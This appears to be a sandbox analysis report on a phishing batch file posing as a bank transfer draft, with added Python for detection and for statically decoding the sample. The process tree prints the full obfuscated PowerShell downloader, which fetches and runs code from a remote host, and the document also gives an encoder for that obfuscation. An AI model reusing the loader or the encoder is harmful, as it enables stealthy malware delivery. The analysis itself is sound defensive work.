Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/06/2024, 16:13

General

  • Target

    CBQ Funds transfer DraftUdkikspostens44.bat

  • Size

    6KB

  • MD5

    84cb66117acd5104ada1321c3b472f94

  • SHA1

    ee6ca999a1798296139fc0eddca01b10d955e00d

  • SHA256

    7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9

  • SHA512

    483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e

  • SSDEEP

    192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (6 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Run PowerShell and hide display window.

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (4 IoCs)
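The hidden-window signature fires on the `-windowstyle hidden` switch in the powershell.exe command line; what separates this from an administrator's scheduled script is the chain around it, recorded under Processes below: cmd.exe running a .bat from the user's Temp directory, PowerShell started with a hidden window, and PowerShell spawning cmd.exe to echo a path under %appdata%. The Python below is an added example, not the sandbox's own detection logic: it scores process-creation events for that chain. The events are transcribed from this report's process tree (the PowerShell command line is cut after its first statement and the parent of the first cmd.exe is not recorded, so it is left unknown); the field names, the regular expressions and the severity thresholds are this example's own assumptions.

```python
import re
from collections import defaultdict

# Process-creation events transcribed from the process tree in this report.
# The PowerShell command line is cut after its first statement, and the
# parent of the first cmd.exe is not recorded, so its ppid is None. The
# field names (pid, ppid, image, cmdline) are this example's own choice;
# map your telemetry (e.g. Sysmon event ID 1) onto them.
EVENTS = [
    {"pid": 4376, "ppid": None,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"'},
    {"pid": 2476, "ppid": 4376,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -windowstyle hidden "$Gaseosity = 1;..."'},
    {"pid": 1816, "ppid": 2476,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"'},
]

# powershell.exe accepts any unambiguous prefix of -WindowStyle and of the
# value Hidden ("-w h" works), so match the abbreviations too. This
# over-matches a little (e.g. "-wait hold"); acceptable for triage, tighten
# before shipping it as a production rule.
HIDDEN_WINDOW = re.compile(r"(?<!\S)-w\w*\s+h\w*", re.I)
BAT_FROM_TEMP = re.compile(r"\\Temp\\[^\"]*\.bat\b", re.I)
ECHO_APPDATA = re.compile(r"\becho\s+%appdata%", re.I)


def _is(image: str, name: str) -> bool:
    """True when the image path ends in the given executable name."""
    return image.lower().endswith("\\" + name)


def hidden_powershell_chains(events):
    """One finding per powershell.exe started with a hidden window, scored by
    how much of the .bat -> powershell -> cmd chain from this report is
    present around it."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        if not (_is(e["image"], "powershell.exe") and HIDDEN_WINDOW.search(e["cmdline"])):
            continue
        reasons = ["powershell.exe started with a hidden window"]
        chain = [e["pid"]]
        parent = by_pid.get(e["ppid"])
        if parent and _is(parent["image"], "cmd.exe") and BAT_FROM_TEMP.search(parent["cmdline"]):
            reasons.append("parent cmd.exe runs a .bat file from a Temp directory")
            chain.insert(0, parent["pid"])
        for child in children[e["pid"]]:
            if _is(child["image"], "cmd.exe") and ECHO_APPDATA.search(child["cmdline"]):
                reasons.append("child cmd.exe resolves a path under %appdata%")
                chain.append(child["pid"])
        severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
        findings.append({"pid": e["pid"], "chain": chain,
                         "reasons": reasons, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in hidden_powershell_chains(EVENTS):
        print(f["severity"], f["chain"], *f["reasons"], sep="\n  ")
```

A lone hidden-window PowerShell scores low on purpose: plenty of legitimate automation uses it, and the parent and child context is what raises the report's chain to high.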

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. 
';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne 
'.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. 
RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
        3⤵
          PID:1816
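Every string literal in the powershell.exe command line above is passed through `Boligforeningerne`, which keeps one character out of every six (indices 5, 11, 17, ...) and stops before the last character, and `Trkosten` is `. ($Frikirkeligt) <arg>` where `$Frikirkeligt` decodes to `iex`, so each `Trkosten (Boligforeningerne '...')` call is an Invoke-Expression of one decoded statement. The Python below is an added example, not part of the report or of the sample: it reimplements that decoder so the strings can be recovered statically, without running the script, and adds an encoder (the sample has none) to make the layout of the scheme visible. The three encoded strings are transcribed from the command line above; they decode to the `iex` alias, the Firefox User-Agent the script sets, and a URL (the decoder applied to the remaining strings shows the System.Net.WebClient code that uses it).

```python
import random
import string

# Parameters of the sample's Boligforeningerne function: start at index 5,
# keep one character, advance by 6, and stop before the last character
# ($Lappe = $Topsyturn196.Length - $Gaseosity, with $Gaseosity = 1).
START, STEP, KEEP = 5, 6, 1


def decode(enc: str) -> str:
    """Python equivalent of Boligforeningerne: recover the hidden text."""
    limit = len(enc) - KEEP
    return "".join(enc[i:i + KEEP] for i in range(START, limit, STEP))


def encode(plain: str, seed: int = 0) -> str:
    """Inverse of decode(), added to show the layout: five filler characters
    before every real one and one trailing filler. The sample has no encoder."""
    rng = random.Random(seed)
    filler = string.ascii_letters + " ,."
    out = []
    for ch in plain:
        out.append("".join(rng.choice(filler) for _ in range(STEP - KEEP)))
        out.append(ch)
    out.append("".join(rng.choice(filler) for _ in range(KEEP)))
    return "".join(out)


# Encoded strings transcribed from the powershell.exe command line above.
# Runs of spaces are significant: copy them from the raw command line, not
# from an HTML rendering, which collapses consecutive spaces and shifts
# every later character out of frame.
REPORT_STRINGS = {
    "$Frikirkeligt": "AnkomiEjerfeHypo xProgr ",
    "$Mllerier": (
        "AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr."
        " Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wis"
        "Ephem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf "
        "Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4"
        ",utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0"
        " Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0"
        "Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr"
        " appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle "
    ),
    "$Phalerate": (
        "TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4"
        "Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7"
        "anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataks"
        "In,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl "
    ),
}


def decode_report_strings() -> dict:
    """Decode every transcribed string. Trkosten is `. iex <arg>`, so each
    Trkosten (Boligforeningerne '...') call executes one such decoded text."""
    return {name: decode(enc) for name, enc in REPORT_STRINGS.items()}


if __name__ == "__main__":
    for name, text in decode_report_strings().items():
        print(f"{name:14} -> {text!r}")
```

If a decoded string reads cleanly up to some point and turns to noise after it, a run of spaces was almost certainly collapsed just before that point; re-copy the string from the raw process record rather than from a rendered page.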

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hifaarw.s4b.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2476-2-0x00007FF84D7C3000-0x00007FF84D7C5000-memory.dmp

            Filesize

            8KB

          • memory/2476-3-0x000001C479950000-0x000001C479972000-memory.dmp

            Filesize

            136KB

          • memory/2476-13-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-14-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-15-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-16-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB

          • memory/2476-17-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp

            Filesize

            10.8MB